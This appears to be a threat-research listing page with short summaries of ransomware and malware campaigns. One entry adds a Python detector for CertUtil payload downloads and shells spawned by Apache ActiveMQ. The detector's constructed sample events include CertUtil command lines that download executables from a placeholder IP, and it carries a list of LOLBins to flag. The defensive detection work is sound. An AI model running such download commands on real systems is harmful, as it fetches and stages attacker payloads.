Threat Research

    EDR killers have become a standard component of modern ransomware attacks, used by affiliates to disable security tools before deploying encryption payloads. While the BYOVD technique remains common, attackers increasingly adopt driverless methods, legitimate utilities, and customizable kits to evade detection....
    A financially motivated threat group tracked as Hive0163 has been observed using a likely AI-generated malware called Slopoly during ransomware attacks, marking an early example of AI-driven malware development in real-world operations....
    Recent escalations between Iran, the U.S., and Israel have coincided with increased cyber threat activity across the Middle East. Destructive incidents, including kinetic attacks affecting AWS data centers in the UAE and Bahrain, have disrupted regional cloud services....
    MalTerminal is an AI-powered malware that uses GPT-4 to dynamically generate ransomware and other malicious code at runtime, instead of carrying a fixed payload. By creating unique scripts on demand through API calls, it evades traditional signature-based detection and static analysis....
    Reynolds ransomware leverages a Bring Your Own Vulnerable Driver (BYOVD) technique to neutralize endpoint security controls prior to file encryption. It drops a legitimately signed but vulnerable kernel driver, NSecKrnl.sys, and exploits CVE-2025-68947 to gain kernel-level privileges....
    The intrusion started in mid-February 2024 when a threat actor exploited CVE-2023-46604, an unsafe-deserialization flaw in the OpenWire protocol, on an exposed Apache ActiveMQ server. By leveraging the Spring ClassPathXmlApplicationContext class and a custom Spring bean XML configuration hosted on an attacker-controlled server, the attacker achieved remote code execution. The malicious XML executed a command that used Windows CertUtil to download a payload from a remote server....
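    The CertUtil download described above is a detection opportunity regardless of the initial exploit. The following is an added example, not code from the original research: a small Python check that runs over constructed process-creation events (the field names, host names and the 203.0.113.0/24 addresses are assumed for illustration) and flags two things, any CertUtil invocation that fetches a URL with -urlcache, and any shell or LOLBin spawned by an ActiveMQ java.exe parent, so the chain can be spotted even when the payload name changes.

```python
import re
from dataclasses import dataclass, field

# Constructed sample process-creation events (not real telemetry). The field names
# mimic a generic EDR record: parent image and command line, child image and command line.
SAMPLE_EVENTS = [
    # ActiveMQ's java.exe spawns cmd.exe, which runs CertUtil to fetch a payload
    # (the chain described in the post; IP is from the documentation range).
    {"host": "mq01",
     "parent_image": r"C:\Program Files\Java\jre\bin\java.exe",
     "parent_cmdline": "java.exe -Dactivemq.home=C:\\apache-activemq -jar activemq.jar start",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c certutil -urlcache -split -f http://203.0.113.5/x.exe C:\\Users\\Public\\x.exe"},
    # CertUtil itself, spawned from a shell with no ActiveMQ parent visible.
    {"host": "ws07",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "parent_cmdline": "cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/p.txt C:\\Users\\Public\\p.txt"},
    # Benign CertUtil use: hashing a file, no download.
    {"host": "ws07",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "parent_cmdline": "cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -hashfile C:\\temp\\installer.exe SHA256"},
    # Benign shell from an interactive user session.
    {"host": "ws07",
     "parent_image": r"C:\Windows\explorer.exe",
     "parent_cmdline": "explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir C:\\Users"},
]

# CertUtil used as a downloader: the binary name, the -urlcache switch and an http(s) URL
# all present on one command line (order of other switches does not matter).
CERTUTIL_DOWNLOAD = re.compile(r"certutil(?:\.exe)?\b.*-urlcache\b.*\bhttps?://", re.IGNORECASE)
URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# A java.exe parent whose command line mentions ActiveMQ identifies the broker process.
ACTIVEMQ_MARKER = re.compile(r"activemq", re.IGNORECASE)
# Children a message broker has no business spawning.
SHELL_OR_LOLBIN = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe", "mshta.exe"}


@dataclass
class Finding:
    host: str
    rule: str
    cmdline: str
    urls: list = field(default_factory=list)  # download URLs extracted for IOC pivoting


def basename(path: str) -> str:
    """Last path component, lower-cased, accepting both Windows and POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def analyze(events):
    """Return one Finding per rule that matches each event; an event can hit both rules."""
    findings = []
    for ev in events:
        child = basename(ev["image"])
        parent = basename(ev["parent_image"])
        cmd = ev["cmdline"]
        if CERTUTIL_DOWNLOAD.search(cmd):
            findings.append(Finding(ev["host"], "certutil_remote_download", cmd, URL.findall(cmd)))
        if parent == "java.exe" and ACTIVEMQ_MARKER.search(ev["parent_cmdline"]) and child in SHELL_OR_LOLBIN:
            findings.append(Finding(ev["host"], "activemq_spawned_shell", cmd, URL.findall(cmd)))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] host={f.host} urls={f.urls} cmd={f.cmdline}")
```

    The parent-process rule is the more durable of the two: a CVE-2023-46604 exploit can swap CertUtil for PowerShell or bitsadmin, but the code execution still originates from the broker's java.exe, so any shell or LOLBin child of that process is worth an alert on its own.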
    Osiris ransomware is a modern, enterprise-focused threat that conducts targeted intrusions involving deep network compromise, data exfiltration, and double-extortion tactics before encrypting victim systems....
    Labs have uncovered a multi-stage malware campaign mainly targeting users in Russia. The attack starts with social engineering via business-themed documents that appear routine and harmless. These files distract victims with fake tasks or status messages while malicious processes run in the background....
    DeadLock is a low-profile ransomware discovered in July 2025 that stands out for operating without known affiliates or a data leak site. Despite limited victim visibility, the group employs an unusual technique by abusing Polygon smart contracts to rotate or distribute proxy server addresses, enabling stealthy and decentralized infrastructure management....
    Medusa has emerged as one of the most active ransomware-as-a-service groups, ranking among the top 10 threats in 2025 and impacting over 500 organizations by January 2026....